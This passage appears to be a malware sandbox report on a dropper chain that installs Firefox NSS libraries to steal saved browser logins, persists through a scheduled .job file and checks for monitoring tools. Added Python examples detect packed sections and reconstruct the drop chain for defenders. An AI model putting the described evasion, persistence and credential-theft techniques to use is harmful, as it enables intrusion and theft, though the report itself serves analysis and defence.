Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 12.2.explorti.exe.bf0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vtxlewez:EW;ehvxcztv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vtxlewez:EW;ehvxcztv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Unpacked PE file: 13.2.25bb638aac.exe.e40000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 17.2.explorti.exe.bf0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vtxlewez:EW;ehvxcztv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vtxlewez:EW;ehvxcztv:EW;.taggant:EW;
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCA3480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime, 0_2_6CCA3480
Source: initial sample Static PE information: section where entry point is pointing to: .data
Source: random[1].exe.11.dr Static PE information: real checksum: 0x0 should be: 0x25807a
Source: GHCGDAFCFH.exe.0.dr Static PE information: real checksum: 0x1deb8b should be: 0x1d793e
Source: Zachv5lCuu.exe Static PE information: real checksum: 0x0 should be: 0x25807a
Source: explorti.exe.9.dr Static PE information: real checksum: 0x1deb8b should be: 0x1d793e
Source: amadka[1].exe.0.dr Static PE information: real checksum: 0x1deb8b should be: 0x1d793e
Source: 25bb638aac.exe.11.dr Static PE information: real checksum: 0x0 should be: 0x25807a
Source: Zachv5lCuu.exe Static PE information: section name:
Source: Zachv5lCuu.exe Static PE information: section name:
Source: Zachv5lCuu.exe Static PE information: section name:
Source: Zachv5lCuu.exe Static PE information: section name:
Source: Zachv5lCuu.exe Static PE information: section name:
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: GHCGDAFCFH.exe.0.dr Static PE information: section name:
Source: GHCGDAFCFH.exe.0.dr Static PE information: section name: .idata
Source: GHCGDAFCFH.exe.0.dr Static PE information: section name:
Source: GHCGDAFCFH.exe.0.dr Static PE information: section name: vtxlewez
Source: GHCGDAFCFH.exe.0.dr Static PE information: section name: ehvxcztv
Source: GHCGDAFCFH.exe.0.dr Static PE information: section name: .taggant
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: vtxlewez
Source: amadka[1].exe.0.dr Static PE information: section name: ehvxcztv
Source: amadka[1].exe.0.dr Static PE information: section name: .taggant
Source: explorti.exe.9.dr Static PE information: section name:
Source: explorti.exe.9.dr Static PE information: section name: .idata
Source: explorti.exe.9.dr Static PE information: section name:
Source: explorti.exe.9.dr Static PE information: section name: vtxlewez
Source: explorti.exe.9.dr Static PE information: section name: ehvxcztv
Source: explorti.exe.9.dr Static PE information: section name: .taggant
Source: random[1].exe.11.dr Static PE information: section name:
Source: random[1].exe.11.dr Static PE information: section name:
Source: random[1].exe.11.dr Static PE information: section name:
Source: random[1].exe.11.dr Static PE information: section name:
Source: random[1].exe.11.dr Static PE information: section name:
Source: 25bb638aac.exe.11.dr Static PE information: section name:
Source: 25bb638aac.exe.11.dr Static PE information: section name:
Source: 25bb638aac.exe.11.dr Static PE information: section name:
Source: 25bb638aac.exe.11.dr Static PE information: section name:
Source: 25bb638aac.exe.11.dr Static PE information: section name:
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCDB536 push ecx; ret 0_2_6CCDB549
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_00C0D82C push ecx; ret 11_2_00C0D83F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F962790 push 7F960002h; ret 13_2_7F96279F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F960C90 push 7F960002h; ret 13_2_7F960C9F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F960F90 push 7F960002h; ret 13_2_7F960F9F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F961290 push 7F960002h; ret 13_2_7F96129F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F961590 push 7F960002h; ret 13_2_7F96159F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F961890 push 7F960002h; ret 13_2_7F96189F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F961B90 push 7F960002h; ret 13_2_7F961B9F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F961E90 push 7F960002h; ret 13_2_7F961E9F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F962190 push 7F960002h; ret 13_2_7F96219F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F962490 push 7F960002h; ret 13_2_7F96249F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F962880 push 7F960002h; ret 13_2_7F96288F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F962580 push 7F960002h; ret 13_2_7F96258F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F960A80 push 7F960002h; ret 13_2_7F960A8F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F960D80 push 7F960002h; ret 13_2_7F960D8F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F961080 push 7F960002h; ret 13_2_7F96108F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F961380 push 7F960002h; ret 13_2_7F96138F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F961680 push 7F960002h; ret 13_2_7F96168F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F961980 push 7F960002h; ret 13_2_7F96198F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F961C80 push 7F960002h; ret 13_2_7F961C8F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F961F80 push 7F960002h; ret 13_2_7F961F8F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F962280 push 7F960002h; ret 13_2_7F96228F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F9628B0 push 7F960002h; ret 13_2_7F9628BF
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F9625B0 push 7F960002h; ret 13_2_7F9625BF
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F960AB0 push 7F960002h; ret 13_2_7F960ABF
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F960DB0 push 7F960002h; ret 13_2_7F960DBF
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F9610B0 push 7F960002h; ret 13_2_7F9610BF
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F9613B0 push 7F960002h; ret 13_2_7F9613BF
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F9616B0 push 7F960002h; ret 13_2_7F9616BF
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F9619B0 push 7F960002h; ret 13_2_7F9619BF
Source: Zachv5lCuu.exe Static PE information: section name: entropy: 7.994867359206323
Source: Zachv5lCuu.exe Static PE information: section name: entropy: 7.979281108132543
Source: Zachv5lCuu.exe Static PE information: section name: entropy: 7.9547601540744886
Source: GHCGDAFCFH.exe.0.dr Static PE information: section name: entropy: 7.980908354134591
Source: GHCGDAFCFH.exe.0.dr Static PE information: section name: vtxlewez entropy: 7.955312989748896
Source: amadka[1].exe.0.dr Static PE information: section name: entropy: 7.980908354134591
Source: amadka[1].exe.0.dr Static PE information: section name: vtxlewez entropy: 7.955312989748896
Source: explorti.exe.9.dr Static PE information: section name: entropy: 7.980908354134591
Source: explorti.exe.9.dr Static PE information: section name: vtxlewez entropy: 7.955312989748896
Source: random[1].exe.11.dr Static PE information: section name: entropy: 7.994867359206323
Source: random[1].exe.11.dr Static PE information: section name: entropy: 7.979281108132543
Source: random[1].exe.11.dr Static PE information: section name: entropy: 7.9547601540744886
Source: 25bb638aac.exe.11.dr Static PE information: section name: entropy: 7.994867359206323
Source: 25bb638aac.exe.11.dr Static PE information: section name: entropy: 7.979281108132543
Source: 25bb638aac.exe.11.dr Static PE information: section name: entropy: 7.9547601540744886
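The section-name and entropy rows above come from static parsing of each file's section table: every sample carries sections with an empty name, and their raw data scores between 7.95 and 7.99 bits per byte, which is what compressed or encrypted payload data looks like. The following Python is an added example, not part of this report or of the sandbox's tooling; it walks a PE section table with the standard library only and flags the same things: nameless or non-printable section names, near-maximal entropy, and sections mapped both writable and executable (the static counterpart of the "changes PE section rights" signature in the summary). The image it scans is constructed in memory for the example, with section names and entropies chosen to mirror the rows above, and the 7.9 cut-off is an assumption, not a value taken from the report.

```python
import math
import struct
from collections import Counter

# Section entropy above this is treated as packed/encrypted data. The samples in this report
# score 7.95-7.99; the cut-off itself is an assumption chosen for this example.
HIGH_ENTROPY = 7.9
SECTION_HDR = "<8sIIIIIIHHI"            # IMAGE_SECTION_HEADER, 40 bytes
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def scan_sections(pe: bytes) -> list:
    """Walk the section table of a PE image and flag what the report's static checks flag:
    nameless or non-printable section names, high-entropy raw data, and write+execute rights."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    num_sections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    size_opt = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    table = e_lfanew + 24 + size_opt            # signature (4) + COFF header (20) + optional header
    results = []
    for i in range(num_sections):
        (raw_name, _vsize, _va, raw_size, raw_ptr,
         _reloc, _line, _nreloc, _nline, chars) = struct.unpack_from(SECTION_HDR, pe, table + i * 40)
        name = raw_name.rstrip(b"\0")
        data = pe[raw_ptr:raw_ptr + raw_size]   # slicing past EOF just truncates
        entropy = shannon_entropy(data)
        flags = []
        if not name:
            flags.append("nameless")
        elif not all(0x21 <= b <= 0x7E for b in name):
            flags.append("special-chars")
        if entropy > HIGH_ENTROPY:
            flags.append("high-entropy")
        if chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE:
            flags.append("write+exec")
        results.append({"name": name.decode("latin-1"), "raw_size": raw_size,
                        "entropy": round(entropy, 4), "flags": flags})
    return results


def build_sample_pe() -> bytes:
    """Constructed minimal PE32 image for this example (not one of the report's files): a plain
    .text section, a nameless write+execute section of uniform bytes, and a randomly named
    section whose bytes are almost uniform, mirroring the entropies listed in the report."""
    sections = [  # (name, raw data, characteristics)
        (b".text", b"\x90" * 4000 + b"\xc3" * 96, 0x60000020),                      # code, r-x
        (b"", bytes(range(256)) * 64, 0xE0000040),                                   # nameless, rwx
        (b"vtxlewez", bytes(range(256)) * 32 + bytes(range(128)) * 8, 0xC0000040),   # data, rw-
    ]
    size_opt = 0xE0                                 # PE32 optional header size
    hdr_end = 0x40 + 4 + 20 + size_opt + 40 * len(sections)
    data_start = (hdr_end + 0x1FF) & ~0x1FF        # FileAlignment 0x200
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, size_opt, 0x0102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (size_opt - 2)       # PE32 magic, rest zeroed
    table, blobs, ptr, va = b"", b"", data_start, 0x1000
    for name, data, chars in sections:
        raw_size = (len(data) + 0x1FF) & ~0x1FF
        table += struct.pack(SECTION_HDR, name.ljust(8, b"\0"), len(data), va,
                             raw_size, ptr, 0, 0, 0, 0, chars)
        blobs += data.ljust(raw_size, b"\0")
        ptr += raw_size
        va += (raw_size + 0xFFF) & ~0xFFF
    return (dos + b"PE\0\0" + coff + opt + table).ljust(data_start, b"\0") + blobs


if __name__ == "__main__":
    for s in scan_sections(build_sample_pe()):
        print(f"{s['name']!r:12} raw={s['raw_size']:#8x} entropy={s['entropy']:.4f} {' '.join(s['flags'])}")
```

To use it on a real dropped file, replace `build_sample_pe()` with the bytes of the file; when every sizeable section scores close to 8.0, as here, only the unpacking stub is visible statically and the payload has to be recovered from memory after it runs.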
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File created: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\amadka[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe File created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
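The file-creation rows above show two things at once. Each `name[1].ext` entry under `INetCache\IE\` is the URL-cache copy WinINet writes while downloading a file, and the same names reappear in `C:\ProgramData` as `nss3.dll`, `mozglue.dll`, `freebl3.dll` and `softokn3.dll` (Firefox's NSS libraries, which a stealer loads to decrypt saved browser logins) plus the `msvcp140.dll` and `vcruntime140.dll` runtime they need. The executables form a chain: `Zachv5lCuu.exe` drops `GHCGDAFCFH.exe`, which installs `explorti.exe` and registers it through the legacy Task Scheduler file `C:\Windows\Tasks\explorti.job`, and `explorti.exe` then downloads `25bb638aac.exe`. The identical section entropies listed earlier for `GHCGDAFCFH.exe`, `amadka[1].exe` and `explorti.exe` are consistent with one downloaded binary being copied from the cache into Temp and then installed. The script below is an added example, not part of this report; it parses rows copied from this page, groups dropped files per process by location, checks whether the full NSS set landed in ProgramData, and rebuilds the drop chain. The row regexes and the classification rules are the example's own assumptions about the report format.

```python
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Rows copied from this report's file-creation and process tables; the selection (including one
# of the report's repeated ProgramData rows) is the example's own.
SAMPLE = r"""
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File created: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\amadka[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe File created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
"""

SOURCE_RE = re.compile(r"^Source: (?P<proc>\S+) ")
CREATED_RE = re.compile(r"^Source: (?P<proc>\S+) File created: (?P<path>\S+)")
CACHE_COPY_RE = re.compile(r"^(?P<stem>.+)\[\d+\](?P<ext>\.[^.]+)$")   # name[1].ext: WinINet cache naming
NSS_LIBS = {"nss3.dll", "mozglue.dll", "freebl3.dll", "softokn3.dll"}  # Firefox NSS, needed to decrypt saved logins


def classify(path: str) -> str:
    low = path.lower()
    if "\\inetcache\\" in low:
        return "inetcache"              # URL-cache copy written during the download
    if low.startswith("c:\\programdata\\"):
        return "programdata"
    if low.startswith("c:\\windows\\tasks\\") and low.endswith(".job"):
        return "task-job"               # legacy Task Scheduler job file: persistence
    if low.endswith(".exe"):
        return "dropped-exe"
    return "other"


def summarize_drops(text: str) -> dict:
    """Per dropping process: file names by location, whether the full NSS set landed in
    ProgramData, and which cached downloads were then written there under their real names."""
    buckets = defaultdict(lambda: defaultdict(set))
    for line in text.splitlines():
        if m := CREATED_RE.match(line):
            buckets[m["proc"]][classify(m["path"])].add(PureWindowsPath(m["path"]).name)
    out = {}
    for proc, by_kind in buckets.items():
        in_programdata = by_kind.get("programdata", set())
        cached = {CACHE_COPY_RE.sub(r"\g<stem>\g<ext>", n) for n in by_kind.get("inetcache", set())}
        out[proc] = {kind: sorted(names) for kind, names in by_kind.items()}
        out[proc]["nss_stack_in_programdata"] = NSS_LIBS <= in_programdata
        out[proc]["cache_then_copied"] = sorted(cached & in_programdata)
    return out


def drop_chain(text: str) -> list:
    """Edges (dropper, dropped exe) for every created file that later shows up as a process."""
    procs = {m["proc"] for m in map(SOURCE_RE.match, text.splitlines()) if m}
    edges = []
    for line in text.splitlines():
        if (m := CREATED_RE.match(line)) and m["path"] in procs and (m["proc"], m["path"]) not in edges:
            edges.append((m["proc"], m["path"]))
    return edges


def lineage(edges: list, root: str) -> list:
    """Depth-first order of processes descending from the submitted sample."""
    order, stack = [], [root]
    while stack:
        node = stack.pop()
        if node in order:
            continue
        order.append(node)
        stack.extend(reversed([child for parent, child in edges if parent == node]))
    return order


if __name__ == "__main__":
    for proc, info in summarize_drops(SAMPLE).items():
        print(proc, info)
    root = r"C:\Users\user\Desktop\Zachv5lCuu.exe"
    print(" -> ".join(PureWindowsPath(p).name for p in lineage(drop_chain(SAMPLE), root)))
```

On a live host the same three locations are the ones to sweep: the NSS set in `C:\ProgramData`, randomly named executables under `%LOCALAPPDATA%\Temp`, and `.job` files in `C:\Windows\Tasks`, which the modern Task Scheduler UI does not list.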
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD055F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6CD055F0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

